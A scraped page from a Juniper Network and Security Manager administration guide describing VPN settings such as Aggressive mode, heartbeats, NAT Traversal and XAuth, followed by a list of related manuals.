Table of Contents
Advertisement
Copyright © 2010, Juniper Networks, Inc.
Because Aggressive mode is typically faster but less secure than Main mode, use
Aggressive mode when speed is more important than security.
For RAS VPNs, you must use the Aggressive mode; for VPNs that do not include RAS
users, select the mode that meets your requirements.
Configuring Heartbeats
Use heartbeats to enable redundant gateways.
Hello—Enter the number of seconds the security devices wait between sending hello
pulses.
Reconnect—Enter the maximum number of seconds the security devices wait for a
reply to the hello pulse.
Threshold—Enter the number of seconds that the security devices wait before
attempting to reconnect.
Configuring NAT Traversal
Because NAT obscures the IP address in some IPSec packet headers, VPN nodes cannot
receive VPN traffic that passes through an external NAT device. To enable VPN traffic
to traverse a NAT device, you can use NAT Traversal (NAT-T) to encapsulate the VPN
packets in UDP. If a VPN node with NAT-T enabled detects an external NAT device, it
checks every VPN packet to determine if NAT-T is necessary.
Because checking every packet impacts VPN performance, you should only use NAT
Traversal for remote users that must connect to the VPN over an external NAT device.
You do not need to enable NAT-T for your internal security device nodes that use NAT;
each VPN node knows the correct address translations for VPN traffic and does not need
to encapsulate the traffic.
To use NAT-T, enable NAT-Traversal and specify:
UDP Checksum—A 2-byte value (calculated from the UDP header, footer, and other
UDP message fields) that verifies packet integrity. You must enable this option for
NAT devices that require UDP checksum verification; however, most NAT devices
(including security devices) do not require it.
Keep alive Frequency—The number of seconds a VPN node waits between sending
empty UDP packets through the NAT device. A NAT device keeps translated IP
addresses active only during traffic flow, and invalidates unused IP addresses. To
ensure that the VPN tunnel remains open, you can configure the VPN node to send
empty "keep alive" packets through the NAT device.
Configuring XAuth
Use the XAuth protocol to authenticate RAS users with an authentication token (such
as SecureID) and to make TCP/IP settings (IP address, DNS server, and WINS server)
for the peer gateway.
Chapter 12: Configuring VPNs
577
Advertisement
Table of Contents
Related Manuals for Juniper NETWORK AND SECURITY MANAGER 2010.4 - ADMININISTRATION GUIDE REV1
Related Products for Juniper NETWORK AND SECURITY MANAGER 2010.4 - ADMININISTRATION GUIDE REV1
- Juniper NETWORK AND SECURITY MANAGER 2010.3 - CONFIGURING INTRUSION DETECTION AND PREVENTION GUIDE REV1
- Juniper NETWORK AND SECURITY MANAGER 2010.4 - API GUIDE REV 1
- Juniper NETWORK AND SECURITY MANAGER 2010.3 - M-SERIES AND MX-SERIES DEVICES GUIDE REV1
- Juniper NETWORK AND SECURITY MANAGER 2010.2 - ADMINISTRATION GUIDE REV1
- Juniper NETWORK AND SECURITY MANAGER 2010.3 - ADMINISTRATION GUIDE REV1
- Juniper NETWORK AND SECURITY MANAGER 2010.4 - CONFIGURING J SERIES SERVICES ROUTERS AND SRX SERIES SERVICES GATEWAYS GUIDE REV
- Juniper NETWORK AND SECURITY MANAGER 2010.4 - NSMXPRESS SERIES II REV 1
- Juniper NETWORK AND SECURITY MANAGER 2010.4 - REV1
- Juniper NETWORK AND SECURITY MANAGER 2010.4 - M-SERIES AND MX-SERIES DEVICES GUIDE REV 1
- Juniper NETWORK AND SECURITY MANAGER 2010.3
- Juniper NETWORK AND SECURITY MANAGER 2010.2
- Juniper MEDIA FLOW CONTROLLER 2.0.4 -
- Juniper SECURITY THREAT RESPONSE MANAGER 2008.2 - AQL EVENT AND FLOW QUERY CLI GUIDE
- Juniper SECURITY THREAT RESPONSE MANAGER 2008.2 - EVENT CATEGORY CORRELATION REV 1
- Juniper SECURITY THREAT RESPONSE MANAGER 2008.2 - SNMP AGENT GUIDE REV 1
- Juniper STRM LOG MANAGEMENT 2008.2 - S 6-2008